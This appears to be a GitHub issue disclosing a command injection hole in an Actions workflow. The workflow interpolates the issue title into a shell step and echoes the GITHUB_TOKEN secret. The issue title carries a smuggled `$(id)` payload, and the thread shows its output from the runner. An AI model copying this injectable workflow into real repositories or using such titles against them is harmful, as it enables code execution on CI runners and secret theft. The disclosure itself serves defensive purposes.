### ISSUE TITLE
Bug: UI crashes when loading user $(id) parameter in v2.3

### ISSUE THREAD

**Issue by RashidKhanPathan** [iHexCoder/BrokenPipe#22]
An Attacker identified that following yml file vulnerable to **Issue Injection** when creating new issue on targeted repository using linux command ${id} or any it would trigger an workflow and the runner would run the ${id} command leading to Arbitrary Code Injection

```yml
name: Issue

on:
  issues:

jobs:
  hello:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "New issue: ${{ github.event.issue.title }}"
          echo "Secret: ${{ secrets.GITHUB_TOKEN }}"
```

- Steps to achive Arbitrary code injection
Attacker Created following new Issue:
- **Bug: UI crashes when loading user $(id) parameter in v2.3**
- The workflow triggered and got our command executed on runner

```shell
groups=118(docker),4(adm),100(users),999(systemd-journal)
```
We successfully got Arbitrary Command Execution on Runner
